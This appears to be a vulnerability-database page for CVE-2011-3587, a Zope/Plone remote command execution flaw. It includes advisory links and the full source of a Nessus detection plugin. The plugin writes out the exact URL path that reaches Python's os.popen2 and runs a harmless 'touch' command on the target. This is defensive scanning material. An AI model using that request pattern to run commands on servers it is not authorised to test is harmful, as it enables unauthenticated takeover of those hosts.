Vulnerabilities > CVE-2011-3587

047910
CVSS 9.3 - CRITICAL
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
plone
zope
critical
nessus
exploit available
metasploit
NVD
Published: 2011-10-10
Updated: 2011-10-21

Summary

Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute arbitrary commands via vectors related to the p_ class in OFS/misc_.py and the use of Python modules.

Vulnerable Configurations

Part Description Count
Application
Plone
14
Application
Zope
46

D2sec

namePlone RCE
urlhttp://www.d2sec.com/exploits/plone_rce.html

Exploit-Db

descriptionPlone and Zope Remote Command Execution PoC. CVE-2011-3587. Webapps exploits for multiple platform
idEDB-ID:18262
last seen2016-02-02
modified2011-12-21
published2011-12-21
reporterNick Miles
sourcehttps://www.exploit-db.com/download/18262/
titlePlone and Zope Remote Command Execution PoC

Metasploit

descriptionUnspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute arbitrary commands via vectors related to the p_ class in OFS/misc_.py and the use of Python modules.
idMSF:EXPLOIT/MULTI/HTTP/PLONE_POPEN2
last seen2020-06-10
modified2017-07-24
published2011-12-27
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/plone_popen2.rb
titlePlone and Zope XMLTools Remote Command Execution

Nessus

NASL familyCGI abuses
NASL idPLONE_20110928.NASL
descriptionThe version of Plone hosted on the remote web server has a flaw that allows arbitrary access to Python modules. Using a specially crafted URL, this can allow an unauthenticated, remote attacker the ability to run arbitrary commands on the system through the Python
last seen2020-06-01
modified2020-06-02
plugin id57350
published2011-12-20
reporterThis script is Copyright (C) 2011-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/57350
titlePlone Request Parsing Remote Command Execution
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(57350);
  script_version("1.13");
  script_cvs_date("Date: 2018/11/15 20:50:18");

  script_cve_id("CVE-2011-3587");
  script_bugtraq_id(49857);

  script_name(english:"Plone Request Parsing Remote Command Execution");
  script_summary(english:"Tries to execute a command.");

  script_set_attribute(
    attribute:"synopsis",
    value:
"A web application on the remote host allows arbitrary remote code
execution."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The version of Plone hosted on the remote web server has a flaw that
allows arbitrary access to Python modules.  Using a specially crafted
URL, this can allow an unauthenticated, remote attacker the ability to
run arbitrary commands on the system through the Python 'os' module in
the context of the 'Zope/Plone' service."
  );
  script_set_attribute(attribute:"see_also", value:"http://plone.org/products/plone/security/advisories/20110928");
  script_set_attribute(attribute:"see_also", value:"http://plone.org/products/plone-hotfix/releases/20110928");
  # http://zope2.zope.org/news/security-vulnerability-announcement-cve-2011-3587
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b32a0de5");
  script_set_attribute(attribute:"see_also", value:"https://pypi.org/project/Products.PloneHotfix20110928/1.0/");
  script_set_attribute(attribute:"solution", value:"Follow the instructions in the advisory to apply the hotfix.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Plone RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Plone and Zope XMLTools Remote Command Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');

script_set_attribute(attribute:"vuln_publication_date", value:"2011/09/28");
  script_set_attribute(attribute:"patch_publication_date", value:"2011/09/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2011/12/20");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:plone:plone");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.");

  script_dependencies("plone_detect.nasl", "os_fingerprint.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/plone");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("http.inc");
include("misc_func.inc");
include("webapp_func.inc");
include("url_func.inc");

# Get details of Plone install.
port = get_http_port(default:80);

install = get_install_from_kb(appname:"plone", port:port, exit_on_fail:TRUE);
dir = install["dir"];

# Verify the vuln exists (regardless of whether we can exploit it)
os_module = "p_/webdav/xmltools/minidom/xml/sax/saxutils/os";
url = dir + "/" + os_module;

res = http_send_recv3(
  method       : "GET",
  item         : url,
  port         : port,
  exit_on_fail : TRUE
);

if ("<module 'os' from '" >!< res[2])
  exit(0, "The Plone installation at " + build_url(port:port, qs:dir) + " is not affected.");

# it looks like only Unix Systems have popen2 compiled in,
# so this shouldn't work on Windows - but we can try anyways
file_name = SCRIPT_NAME + "-" + unixtime();
unix_command = urlencode(str:"touch /tmp/"+ file_name);
windows_command = urlencode(str:"echo " + SCRIPT_NAME + " > %windir%/temp/"+file_name);

verify_instructions =
'An attempt was made to create a temporary file on the remote host.\n'+
'You can verify its existence by checking for it at the following\n'+
'path';

os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ("Windows" >< os)
  {
    commands = make_list(unix_command, windows_command);
    verify_instructions += 's:\n\n';
    verify_instructions += '  C:\\Windows\\temp\\' + file_name + '\n';
    verify_instructions += '  C:\\Winnt\\temp\\' + file_name + '\n';
  }
  else
  {
    commands = make_list(unix_command);
    verify_instructions += ':\n\n';
    verify_instructions += '  /tmp/' + file_name + '\n';
  }
}
else {
  commands = make_list(unix_command, windows_command);
  verify_instructions += 's (dependent on host operating system):\n\n';
  verify_instructions += '  /tmp/' + file_name + '\n';
  verify_instructions += '  C:\\Windows\\temp\\' + file_name + '\n';
  verify_instructions += '  C:\\Winnt\\temp\\' + file_name + '\n';
}

command_success = FALSE;
url_list = make_list();

foreach command (commands)
{
  url = dir + "/" + os_module + "/popen2?cmd=" + command;
  url_list = make_list(url_list, url);
  res = http_send_recv3(
    method       : "GET",
    item         : url,
    port         : port,
    exit_on_fail : TRUE
  );

  if ("<open file '<fdopen>'" >< res[2]) command_success = TRUE;
}

if (report_verbosity > 0)
{
  if (command_success)
  {
    report = '\nNessus was allowed to execute commands on the remote host.\n' +
    'The following requests were made:\n\n';
    foreach url (url_list)
      report += '  ' + build_url(qs:url, port:port) + '\n';
    report += '\n' + verify_instructions;
  }
  else
  {
    report = '\nNessus was able to determine that the vulnerability exists on the\n' +
    'remote host, but was not able to successfully exploit it.\n';
  }
  security_hole(port:port, extra:report);
}
else security_hole(port);

Packetstorm

Saint

bid49857
descriptionPlone Zope SAXutils Command Execution
osvdb76105
titleplone_zope_saxutils_cmd_exec
typeremote

Seebug

  • bulletinFamilyexploit
    descriptionBUGTRAQ ID: 49857 CVE ID: CVE-2011-3587 Zope是一个开源的web应用服务器,主要用python写成 Zope在实现上存在远程命令执行漏洞,非法攻击者可利用此漏洞部署特制的Web请求并以Zope/Plone服务权限执行任意命令 0 Zope 2.13.9 Zope 2.13.8 Zope 2.13 Zope 2.12.19 Zope 2.12 Plone 4.x 厂商补丁: Zope ---- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.zope.org/
    idSSV:26110
    last seen2017-11-19
    modified2011-12-26
    published2011-12-26
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-26110
    titleZope框架&quot;cmd&quot;参数远程命令执行漏洞
  • bulletinFamilyexploit
    descriptionBUGTRAQ ID: 49857 CVE ID: CVE-2011-3587 Zope是一个开源的web应用服务器,主要用python写成 Zope在实现上存在远程命令执行漏洞,非法攻击者可利用此漏洞部署特制的Web请求并以Zope/Plone服务权限执行任意命令 0 Zope 2.13.9 Zope 2.13.8 Zope 2.13 Zope 2.12.19 Zope 2.12 Plone 4.x 厂商补丁: Zope ---- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.zope.org/
    idSSV:72431
    last seen2017-12-25
    modified2014-07-01
    published2014-07-01
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-72431
    titlePlone and Zope Remote Command Execution PoC

References